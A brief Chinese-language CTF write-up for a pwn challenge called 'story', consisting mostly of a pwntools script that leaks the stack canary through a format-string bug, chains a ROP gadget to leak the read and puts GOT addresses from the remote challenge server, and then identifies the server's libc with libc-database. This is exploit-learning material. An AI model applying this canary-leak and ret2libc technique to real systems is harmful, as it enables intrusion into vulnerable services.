记录下学到的姿势,利用信息泄露得到服务器libc 至少两个函数偏移,利用libc-databse得到服务器libc版本
泄露脚本如下
from pwn import * context.log_level='DEBUG' r=remote('ctf2.linkedbyx.com',10755) #r=process('./story') elf=ELF('./story') ''' rop_chain= payload='a'*0x90+canary+'b'*8+rop_chain r.sendlineafter('Tell me the size of your story:',payload) ''' ''' 0x0000000000400bd3 : pop rdi ; ret ''' main=0x0000000000400876 r.sendlineafter('Please Tell Your ID:','%15$p') r.recvuntil('Hello ') canary=int(r.recv(18),16) success('canary:'+hex(canary)) payload='a'*0x88+p64(canary)+'b'*8+p64(0x0000000000400bd3)+p64(elf.got['read'])+p64(elf.plt['puts'])+p64(main) r.sendlineafter(':','1024') r.sendlineafter(':',payload) read=r.recv(12) print read #success('read:'+hex(read)) #r.interactive() r.sendlineafter('Please Tell Your ID:','%15$p') r.recvuntil('Hello ') canary=int(r.recv(18),16) success('canary:'+hex(canary)) payload='a'*0x88+p64(canary)+'b'*8+p64(0x0000000000400bd3)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(main) r.sendlineafter(':','1024') r.sendlineafter(':',payload) puts=r.recv(12) print puts r.interactive()
之后./find read 250 puts 690即可泄露服务器libc
root@snip3r:~/libc-database# ./find read 250 puts 690 ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64) archive-glibc (id libc6_2.23-0ubuntu11_amd64)
有了libc直接构造ROP即可